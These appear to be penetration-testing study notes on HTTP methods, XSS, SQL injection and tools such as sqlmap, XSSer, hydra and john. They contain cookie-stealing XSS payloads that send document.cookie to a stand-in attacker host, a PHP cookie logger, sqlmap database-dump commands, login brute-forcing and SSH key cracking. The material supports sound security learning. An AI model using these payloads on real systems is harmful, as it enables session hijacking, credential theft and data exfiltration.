 openssl s_client -connect target.site:443
 httprint -P0 -h <target hosts> -s <signature file>
 nslookup <domain>

The most common HTTP methods are GET, POST, HEAD, PUT and DELETE.

GET is used to request a resource. When a user wants to open a web page, the browser sends a GET
request.

POST is used to submit HTML form data. POST parameters must be in the message body.

HEAD is very similar to GET, but it asks for just the headers of the response instead of the response body.

PUT is used to upload a file to the server. As you can imagine, it is a very dangerous feature if it is allowed
and misconfigured.

DELETE is used to remove a file from the server; this is another feature that must be configured wisely as
a misused DELETE leads to denial of service and data loss.

OPTIONS is used to query the web server for enabled HTTP Verbs.

 wc <file>
 dirbuster
 dirb <domain>
 curl -X GET <ip>
 curl -I <ip>
 curl -X OPTIONS -v <ip>
 curl -X POST -d 'name=<name>&password=<password>' -v <ip>
 curl -X PUT <site> --upload-file <file>
 curl -X DELETE <site>

Using Burp Suite: after setting it up, right-click the request in the Proxy tab and send it to Repeater to edit the request.

 gobuster dir -u http://<ip> -w <wordlist> -b 403,404 -x <extension> -r

Using Burp Suite Intruder, mark the payload position in the request with § markers:

GET /§name§ HTTP/1.0
Cookie: c=cval
Content-Length: 17


a. Cross Site Scripting (XSS):


Cross Site Scripting (XSS) is a vulnerability that lets an attacker control some of the content of a web
application. By exploiting a Cross Site Scripting, the attacker can target the web application users.

XSS vulnerabilities happen when a web application uses unfiltered user input to build the output content
displayed to its end users; this lets an attacker control the output HTML and JavaScript code, thus
attacking the application users.

To exploit an XSS vulnerability that you find, you need to know the type of cross-site scripting attack you
are carrying out. Cross-site scripting vulnerabilities can be reflected, persistent or DOM Based.

Reflected attacks:
happen when the malicious payload is carried inside the request that the browser of the victim sends to
the vulnerable website. They could be triggered by posting a link on a social network or via a phishing
campaign. When users click on the link, they trigger the attack.

The search form XSS we have seen in the previous example is a reflected cross-site scripting vulnerability.
In that example, we could craft a link to the search page and embed the payload in the find GET
parameter: http://victim.site/search.php?find=

Persistent XSS attacks occur when the payload is sent to the vulnerable web server and then stored. When a web page of the
vulnerable website pulls the stored malicious code and puts it within the HTML output, it will deliver the XSS
payload. It is called persistent because the malicious code gets delivered each and every time a web browser
hits the “injected” web page.

This is a very dangerous form of XSS because, with a single attack, the hacker can exploit multiple web
application users. If an attacker manages to write a malicious payload (HTML or JavaScript) on a social
network page, every user visiting that page will run the payload!

The most common vector for persistent attacks are HTML forms that submit content to the web server
and then display that content back to the users. Elements such as comments, user profiles, and forum
posts are a potential vector for XSS attacks.

<script>alert('xss')</script>

Cookie Stealing via XSS:


As you know from the Web Applications module, JavaScript can access cookies if they do not have the
HttpOnly flag enabled; this means that an XSS attack can be used to steal the cookies. In many cases,
stealing a cookie means stealing a user session!

For example, you can display the current cookies with <script>alert(document.cookie)</script>

With the following code, you can send the cookie contents to an attacker-controlled site:

<script>
var i = new Image();
i.src="http://attacker.site/log.php?q="+document.cookie;
</script>


The log.php script saves the cookie in a text file on the attacker.site:

<?php
$filename="/tmp/log.txt";
$fp=fopen($filename, 'a');
$cookie=$_GET['q'];
fwrite($fp, $cookie);
fclose($fp);
?>

 <img src=x onclick=alert("xss")>
 <script>alert("xss")</script>
 <svg onload=prompt("xss")>
 <img src=https://www.google.com/images/branding/googlelogo/1x/googlelogo_color_272x92dp.png onmouseover=confirm("xss")>
 <script>new Image().src='http://ip/h.php?id='+document.cookie</script>

https://github.com/payloadbox/xss-payload-list

 <script>document.body.innerHTML="<b><h1>hacked</h1></b>"</script>
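As an added detection-side example (not part of the original notes), the following Python scans constructed web-server access-log lines for the reflected-XSS indicators shown above: script tags, event handlers on img/svg tags and document.cookie in a GET parameter such as find. The log lines, IPs and paths are made up for the example; the check also handles double URL-encoding.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Indicators taken from the payloads listed in these notes: script tags,
# event handlers on img/svg, and document.cookie exfiltration.
XSS_PATTERNS = [
    re.compile(r"<\s*script\b", re.I),
    re.compile(r"<\s*(img|svg)\b[^>]*\bon\w+\s*=", re.I),
    re.compile(r"document\.cookie", re.I),
]

# Common Log Format line: ip ident user [time] "METHOD path PROTO" status size
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})')

def decode_fully(value, rounds=3):
    # Payloads are often double-encoded; decode until the value stops changing.
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_xss_indicators(path):
    """Return (parameter, pattern) pairs for every query parameter that matches."""
    hits = []
    for name, raw in parse_qsl(urlsplit(path).query, keep_blank_values=True):
        value = decode_fully(raw)
        hits.extend((name, p.pattern) for p in XSS_PATTERNS if p.search(value))
    return hits

def scan_log(lines):
    """Parse log lines and return one alert per request carrying an XSS indicator."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a CLF line; skip it
        hits = find_xss_indicators(m["path"])
        if hits:
            alerts.append({"ip": m["ip"], "path": m["path"],
                           "params": sorted({name for name, _ in hits})})
    return alerts

# Constructed sample log lines (not from a real server); the third is double-encoded.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /search.php?find=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E HTTP/1.1" 200 512',
    '10.0.0.7 - - [10/Oct/2023:13:56:01 +0000] "GET /search.php?find=laptop HTTP/1.1" 200 2048',
    '10.0.0.9 - - [10/Oct/2023:13:57:12 +0000] "GET /comment.php?text=%253Csvg%2520onload%253Dprompt%25281%2529%253E HTTP/1.1" 200 300',
]
```

Pattern matching of this kind catches the textbook payloads but not obfuscated ones, so it is a triage signal to review rather than a substitute for output encoding and HttpOnly cookies in the application itself.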

b. SQL Injection (SQLi):


SQL Injection (SQLi) attacks allow an unauthorized user to take control over SQL statements used by a
web application.

A SQL statement looks like the following: SELECT name, description FROM products WHERE id=9;

You also need to know the UNION command, which performs a union between two results:

<SELECT statement> UNION <other SELECT statement>;

The previous examples show how to use SQL when querying a database directly from its console. To
perform the same tasks from within a web application, the application must:

• Connect to the database

• Submit the query to the database

• Retrieve the results

Then, the application logic can use the results.

The following code contains a PHP example of a connection to a MySQL database and the execution of a
query:

$dbhostname='1.2.3.4';
$dbuser='username';
$dbpassword='password';
$dbname='database';
$connection = mysqli_connect($dbhostname, $dbuser, $dbpassword, $dbname);
$query = "SELECT Name, Description FROM Products WHERE ID='3' UNION SELECT Username, Password FROM Accounts;";
$results = mysqli_query($connection, $query);
display_results($results);

However, most of the time queries are not static; they are dynamically built from user input. Here is a
vulnerable dynamic query example:

$id = $_GET['id'];
$connection = mysqli_connect($dbhostname, $dbuser, $dbpassword, $dbname);
$query = "SELECT Name, Description FROM Products WHERE ID='$id';";
$results = mysqli_query($connection, $query);
display_results($results);

The resulting dynamic query is: SELECT Name, Description FROM Products WHERE ID='$id';

But what if an attacker crafts an $id value that changes the query, for example: ' OR 'a'='a

The query then becomes:

SELECT Name, Description FROM Products WHERE ID='' OR 'a'='a';
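As an added example (not from the original notes), the following Python reproduces the dynamic query above against a constructed in-memory SQLite table: the ' OR 'a'='a input returns every row when the query is built by string interpolation, and no row when the value is bound as a parameter, which is the fix.

```python
import sqlite3

# Constructed in-memory copy of the Products table used in the notes' example query.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Products (ID INTEGER, Name TEXT, Description TEXT)")
    conn.executemany("INSERT INTO Products VALUES (?, ?, ?)", [
        (3, "Laptop", "15 inch"),
        (9, "Phone", "5G"),
        (12, "Router", "WiFi 6"),
    ])
    return conn

def build_query_vulnerable(id_value):
    # Same construction as the PHP above: the input is pasted into the SQL text.
    return f"SELECT Name, Description FROM Products WHERE ID='{id_value}';"

def lookup_vulnerable(conn, id_value):
    # The attacker's quote closes the literal, so ' OR 'a'='a becomes SQL logic.
    return conn.execute(build_query_vulnerable(id_value)).fetchall()

def lookup_safe(conn, id_value):
    # Parameterized query: the input is bound as a value and never parsed as SQL.
    return conn.execute(
        "SELECT Name, Description FROM Products WHERE ID=?", (id_value,)
    ).fetchall()

if __name__ == "__main__":
    conn = make_db()
    payload = "' OR 'a'='a"
    print(build_query_vulnerable(payload))   # WHERE ID='' OR 'a'='a'
    print(lookup_vulnerable(conn, payload))  # all three rows: the WHERE clause is always true
    print(lookup_safe(conn, payload))        # []: no row has that literal ID
```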

c. ZAProxy:
 First, in ZAProxy, add the target IP in Manual Explore and launch the browser; then browse to the specific URL so that it is added to the site tree.
 Right-click the POST request, navigate to "Include in Context" and select "Default Context".
 Click the Authentication tab under the Default Context menu and select "Form-based Authentication" as the method.
 Set the Username parameter to "login" and enter "Login" in "Regex pattern identified in Logged Out response messages".
 Click the "Add" button and add a new user with username "bee" and password "bug".
 Right-click the Site (http://<ip>), navigate to "Include in Context" and select "Default Context".
 Click the "OK" button. Right-click the Site (http://<ip>), navigate to Attack and select "Spider".
 A dialog box will appear; select the "bee" user and click the "Start Scan" button.
 Right-click the Site (http://<ip>), navigate to Attack and select "Active Scan".
 After the scan completes, click the "Alerts" tab.

d. Nikto:
 nikto -h http://<ip>


 nikto -h http://<ip> -T <options>
 nikto -h http://<ip> -T <options> -o <output> -Format htm

e. sqlmap:
sqlmap -u "<page>" --cookie "<cookie>" -p <variable>

sqlmap -r <file> -p <variable>

Use sqlmap to get the list of databases present on the database server:

 sqlmap -u "<page>" --cookie "<cookie>" -p <variable> --dbs

Use sqlmap to get the list of columns in the users table of the bWAPP database:

 sqlmap -u "<page>" --cookie "<cookie>" -p <variable> -D <data_base> -T users --columns

Use sqlmap to dump the password and email for admin from the users table. Press 'n' twice when prompted:

 sqlmap -u "<page>" --cookie "<cookie>" -p <variable> -D <data_base> -T users -C admin,password,email --dump


f. XSSer:
xsser --url 'http://<url>' -p '<parameter>'

Trying various XSS payloads using XSSer's "--auto" option:

 xsser --url 'http://<url>' -p '<parameter>' --auto

Using a custom XSS payload:

 xsser --url 'http://<url>' -p '<parameter>' -Fp "<script>alert(1)</script>"

Feed the URL and cookie to the xsser tool for scanning. Replace the hello string with XSS; this is done so that
XSSer substitutes the payload in place of the value "XSS":

 xsser --url "<url>" --cookie="<cookie>"

g. Attacking login forms:
 hydra -L usernames -P passwords <IP> http-post-form "/login.php:login=^USER^&password=^PASS^&security_level=0&form=submit:Invalid credentials or user not activated!"
 Start Burp, send the intercepted request to Intruder, then click the Load button to load the password list from the wordlist.


2. Additional methods and techniques:

Using ssh2john lets us crack the private key and find the passphrase:

 python3 ssh2john.py id_rsa > hash
 john --wordlist=/root/wordlist --format=ssh /root/hash

What I like to do is upload the shell script called linpeas. We upload that script to the victim machine with a
Python simple HTTP server and run a quick scan.

 /opt/PEAS/linPEAS/linpeas.sh
